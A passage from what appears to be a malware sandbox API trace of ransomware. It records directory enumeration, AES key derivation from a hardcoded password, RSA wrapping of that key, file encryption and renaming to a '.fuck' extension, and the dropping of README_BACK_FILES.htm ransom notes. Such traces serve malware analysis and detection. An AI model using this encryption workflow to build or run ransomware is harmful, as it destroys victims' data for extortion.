dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0265.916] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\sdiagnhost.exe.log.gsg", dwFileAttributes=0x2) returned 1 [0265.916] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2e7a500) returned 1 [0265.919] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0265.919] lstrlenA (lpString="PvMwiXwJkKzPixDiGqwlDZbNzMlQm") returned 29 [0265.919] CryptHashData (hHash=0x2e7f400, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.919] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7f400, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2e7f4c0) returned 1 [0265.919] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.919] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0265.919] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2e78850) returned 1 [0265.920] CryptImportPublicKeyInfo (in: hCryptProv=0x2e78850, dwCertEncodingType=0x1, pInfo=0x2eb1450*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb1480*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb1488*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2e7f580) returned 1 [0265.920] CryptEncrypt (in: hKey=0x2e7f580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0265.920] CryptEncrypt (in: hKey=0x2e7f580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e788d8*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2e788d8*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0265.920] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2e788d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2e788d8*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0265.922] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.933] CryptEncrypt (in: hKey=0x2e7f4c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0265.933] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.937] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.937] CryptEncrypt (in: hKey=0x2e7f4c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0265.937] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.937] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.937] CryptEncrypt (in: hKey=0x2e7f4c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0265.937] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.937] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.937] CryptEncrypt (in: hKey=0x2e7f4c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0265.937] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.937] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.938] CryptEncrypt (in: hKey=0x2e7f4c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0265.938] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.938] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.938] CryptEncrypt (in: hKey=0x2e7f4c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0265.938] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.938] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x5a, lpOverlapped=0x0) returned 1 [0265.938] CryptEncrypt (in: hKey=0x2e7f4c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x5a, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x60) returned 1 [0265.938] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x60, lpOverlapped=0x0) returned 1 [0265.938] CloseHandle (hObject=0x5d44) returned 1 [0265.938] CloseHandle (hObject=0x5d3c) returned 1 [0265.938] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\sdiagnhost.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\sdiagnhost.exe.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\sdiagnhost.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\sdiagnhost.exe.log"), bFailIfExists=0) returned 1 [0265.941] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\sdiagnhost.exe.log", dwFileAttributes=0x0) returned 1 [0265.941] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\sdiagnhost.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\sdiagnhost.exe.log.gsg")) returned 1 [0265.942] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\sdiagnhost.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\sdiagnhost.exe.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\sdiagnhost.exe.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\sdiagnhost.exe.log.fuck")) returned 1 [0265.943] CryptDestroyHash (hHash=0x2e7f400) returned 1 [0265.943] CryptDestroyKey (hKey=0x2e7f4c0) returned 1 [0265.943] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0265.943] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0265.943] FindClose (in: hFindFile=0x2e7ec80 | out: hFindFile=0x2e7ec80) returned 1 [0265.944] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\readme_back_files.htm")) returned 0xffffffff [0265.944] AreFileApisANSI () returned 1 [0265.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28895b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0265.944] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0265.944] GetFileType (hFile=0x5d48) returned 0x1 [0265.945] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0265.946] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0265.946] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0265.946] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\readme_back_files.htm")) returned 0xffffffff [0265.946] AreFileApisANSI () returned 1 [0265.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6cc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0265.946] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0265.947] GetFileType (hFile=0x5d10) returned 0x1 [0265.947] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0265.948] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0265.948] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2e7fbc0 [0265.949] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0265.949] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0265.949] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0265.949] GetLastError () returned 0x0 [0265.949] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\ngen.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\ngen.log")) returned 0x20 [0265.949] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\ngen.log", dwFileAttributes=0x80) returned 1 [0265.949] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\ngen.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\ngen.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0265.950] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\ngen.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\ngen.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0265.951] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\ngen.log.gsg", dwFileAttributes=0x2) returned 1 [0265.951] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2e7a500) returned 1 [0265.953] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0265.953] lstrlenA (lpString="PvMwiXwJkKzPixDiGqwlDZbNzMlQm") returned 29 [0265.953] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.953] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2e7ec80) returned 1 [0265.953] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.953] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0265.954] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2e77e38) returned 1 [0265.954] CryptImportPublicKeyInfo (in: hCryptProv=0x2e77e38, dwCertEncodingType=0x1, pInfo=0x2eb1520*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb1550*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb1558*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2e7f400) returned 1 [0265.954] CryptEncrypt (in: hKey=0x2e7f400, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0265.954] CryptEncrypt (in: hKey=0x2e7f400, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e785a8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2e785a8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0265.954] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2e785a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2e785a8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0265.955] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x2ef, lpOverlapped=0x0) returned 1 [0266.146] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x2ef, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x2f0) returned 1 [0266.146] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x2f0, lpOverlapped=0x0) returned 1 [0266.147] CloseHandle (hObject=0x5d48) returned 1 [0266.147] CloseHandle (hObject=0x5d3c) returned 1 [0266.147] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\ngen.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\ngen.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\ngen.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\ngen.log"), bFailIfExists=0) returned 1 [0266.153] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\ngen.log", dwFileAttributes=0x0) returned 1 [0266.154] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\ngen.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\ngen.log.gsg")) returned 1 [0266.155] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\ngen.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\ngen.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\ngen.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\ngen.log.fuck")) returned 1 [0266.156] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0266.156] CryptDestroyKey (hKey=0x2e7ec80) returned 1 [0266.156] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0266.156] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.156] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7eb80 [0266.159] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0266.159] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0266.159] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0266.159] GetLastError () returned 0x0 [0266.159] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\NGenTask.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\ngentask.exe.log")) returned 0x20 [0266.160] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\NGenTask.exe.log", dwFileAttributes=0x80) returned 1 [0266.160] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\NGenTask.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\ngentask.exe.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0266.161] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\NGenTask.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\ngentask.exe.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0266.162] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\NGenTask.exe.log.gsg", dwFileAttributes=0x2) returned 1 [0266.163] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2e7a500) returned 1 [0266.164] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0266.165] lstrlenA (lpString="PvMwiXwJkKzPixDiGqwlDZbNzMlQm") returned 29 [0266.165] CryptHashData (hHash=0x2e7ec80, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0266.165] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7ec80, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2e7f6c0) returned 1 [0266.165] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0266.165] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0266.165] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2e78168) returned 1 [0266.165] CryptImportPublicKeyInfo (in: hCryptProv=0x2e78168, dwCertEncodingType=0x1, pInfo=0x2eaff30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaff60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaff68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2e7f380) returned 1 [0266.165] CryptEncrypt (in: 